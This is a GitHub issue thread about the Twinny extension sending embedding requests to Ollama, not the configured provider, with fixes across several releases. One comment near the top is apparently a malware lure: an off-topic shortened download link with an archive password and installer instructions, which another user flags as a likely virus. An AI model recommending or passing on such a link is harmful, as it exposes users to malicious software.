### ISSUE TITLE
Does Twinny support embeddings without Ollama?

### ISSUE THREAD

**Issue by Erxl** [twinnydotdev/twinny#303]
Despite setting llamacpp as the backend for embeddings, Twinny is still sending requests to Ollama instead of llamacpp.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Erxl** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

It looks like a virus.

**Comment by geekbozu** [comment]
I'm not sure whats going on with the above, however this seems to be a real issue still
![image](https://github.com/user-attachments/assets/5a9a17ee-6c0a-403a-9682-881bd42860e5)

I made a quick and dirty edit to post the url of the request to embeddings and its showing the ollama url even though my provider is set to use open-webui and such. 

Any thoughts. Lots of progress happening :)

**Comment by rjmacarthy** [comment]
Hey, I just fixed it in v3.15.8 thanks for pointing it out.

**Comment by geekbozu** [comment]
Sadly still no dice :( 
the code seems to be calling this variant of fetchEmbeddings for some reason
 https://github.com/twinnydotdev/twinny/blob/main/src/extension/stream.ts#L96
Which seems to still be hard coded to the option path? Not sure what is going on here. 

To spell out what I'm doing. I'm clicking the embed workspace documents button as show in the second screenshot above

Thanks for being on top of things :D

**Comment by rjmacarthy** [comment]
Hey @geekbozu Ollama updated they API since i released the version of embeddings from `/v1/embeddings` to `/api/embed` and also changed the payload and response, i was not aware of it.  I just fixed in in the latest version. Thanks for pointing it out!

**Comment by geekbozu** [comment]
Sadly still having some issues here. Thanks for tackling this! Twinny has been awesome to use :) 

https://github.com/user-attachments/assets/ec8ec318-6397-4eea-b6b5-e485f9ba220e
I can't seem to select my embedding provider still? 

And with the latest version.  My settings as such. 
I'm still getting 404s in the log as it seems now be respecting the API path now but still not the server and port. 
![image](https://github.com/user-attachments/assets/7eab68da-9a35-477d-8809-f61e91686640)

**Comment by rjmacarthy** [comment]
Hey, are you sure that `/ollama/api/embeddings` is right?

**Comment by geekbozu** [comment]
The openapi docs for openwebui claim it is that. I'll screenshot in a little bit :) 
The issue I'm seeing has Todo with the host and port still being incorrect 
They are `0.0.0.0:11434` instead of the values I have in my provider or settings file. Which are `192.168.1.2:3000`

**Comment by rjmacarthy** [comment]
Have you updated latest version? It works for me to edit the provider.

**Comment by geekbozu** [comment]
I blame me for that one. A laptop reboot cleaned it up so gremlins clearly!
BUT alas one more.  The bearer token is not being set correctly now. :( 
![image](https://github.com/user-attachments/assets/ecdba003-3f84-4201-bda8-23457c5e8ee3)

**Comment by rjmacarthy** [comment]
Hmm, you're right, I just released version 3.16.0 which should address your issue, I would also recommend that you visit the Ollama website and update to the latest version which expects `input` as the parameter for embeddings.

Hope that helps!

**Comment by geekbozu** [comment]
It does! 
Let me clarify something. 
I am using openwebui on top of Ollama. Ollama is NOT exposed on my network and only can be talked through via openwebui. 
And therefore is what Twinny is talking to. :)
It seems that openwebui has the different endpoint syntax here on its ollama endpoint.

**Comment by rjmacarthy** [comment]
Yes, I am aware of how it works.

Thanks for pointing the issues out, much appreciated!

**Comment by geekbozu** [comment]
No thank you for being receptive! Twinny is awesome and I really enjoy using it. Keep up the great work with it and symmetry! 

From my end this is now feature complete. The outstanding issues are NOT with Twinny. 
When pointing twinny at ollama directly via a provider it works as expected now 🎉 

I'll work with OpenWebUI on this as its particular to my use case but OpenWebUI has NOT updated their API layer to support the new endpoint which currently is causing the incompatibility now. 
https://github.com/open-webui/open-webui/blob/4617f3a4e277a716ab75460934257813d8865663/backend/open_webui/apps/ollama/main.py#L542 

Again awesome work :D

**Comment by unclemusclez** [comment]
I believe i am also experiencing this. I am trying to us e the Open WebUI embeddings but it automatically reverts to Local Ollama or nothing. 
![image](https://github.com/user-attachments/assets/b8f04fed-b63c-4f4c-999e-c3ab12abd7c5)
for a few secs, then
![image](https://github.com/user-attachments/assets/43523594-04e9-4e50-9da6-85cf8d46d946)

**Comment by unclemusclez** [comment]
@geekbozu was this resolved? i've been trying to figure this one out
